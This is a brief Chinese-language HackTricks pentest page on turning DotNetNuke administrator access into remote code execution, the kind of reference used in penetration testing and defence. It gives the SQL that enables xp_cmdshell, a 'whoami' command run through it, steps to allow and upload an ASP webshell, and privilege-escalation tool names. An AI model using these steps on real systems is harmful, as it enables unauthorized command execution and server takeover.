DotNetNuke (DNN)

支持 HackTricks

DotNetNuke (DNN)

如果您以 管理员 身份登录 DNN,获取 RCE 很容易。

RCE

通过 SQL

设置 页面下可以访问 SQL 控制台,您可以启用 xp_cmdshell运行操作系统命令

使用以下行启用 xp_cmdshell

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

然后,按 "Run Script" 运行该 SQL 语句。

然后,使用以下内容之一来运行 OS 命令:

xp_cmdshell 'whoami'

通过 ASP webshell

Settings -> Security -> More -> More Security Settings 中,您可以在 Allowable File Extensions添加新的允许扩展名,然后点击 Save 按钮。

添加 aspaspx,然后在 /admin/file-management 中上传一个名为 shell.aspasp webshell

然后访问 /Portals/0/shell.asp 来访问您的 webshell。

权限提升

您可以使用 PotatoesPrintSpoofer 进行 权限提升 例如。

支持 HackTricks

Last updated